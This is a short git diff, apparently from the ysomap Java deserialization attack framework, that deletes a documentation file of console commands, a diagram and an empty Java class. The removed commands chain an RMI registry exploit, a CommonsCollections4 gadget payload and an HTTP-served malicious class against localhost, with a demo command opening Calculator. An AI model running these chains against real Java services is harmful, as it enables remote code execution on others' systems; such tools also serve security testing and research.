diff --git a/doc/testCommand.txt b/doc/testCommand.txt deleted file mode 100644 index f288d99..0000000 --- a/doc/testCommand.txt +++ /dev/null @@ -1,25 +0,0 @@ -use exploit RMIRegistryExploit -use payload RMIConnectWithUnicastRemoteObject -use bullet RMIConnectBullet -set target localhost:1099 -set rhost localhost -set rport 8888 -run - - -use exploit RMIListener -use payload CommonsCollections4 -use bullet TransformerBullet -set lport 8888 -set args "open /System/Applications/Calculator.app" -set version 3 - -use exploit SimpleHTTPServer -use payload EvilFileWrapper -use bullet ClassWithEvilConstructor -set lport 8080 -set path /EvilObj.class -set classname EvilObj -set body "open /System/Applications/Calculator.app" -set type class - diff --git a/doc/ysomap.graffle b/doc/ysomap.graffle deleted file mode 100755 index 01abe9d..0000000 Binary files a/doc/ysomap.graffle and /dev/null differ diff --git a/thirdparty/src/main/java/shell/Exec.java b/thirdparty/src/main/java/shell/Exec.java deleted file mode 100644 index 3cecf0e..0000000 --- a/thirdparty/src/main/java/shell/Exec.java +++ /dev/null @@ -1,12 +0,0 @@ -package shell; - -/** - * @author wh1t3P1g - * @since 2020/10/28 - */ -public class Exec { - - public Exec() throws Exception { - - } -}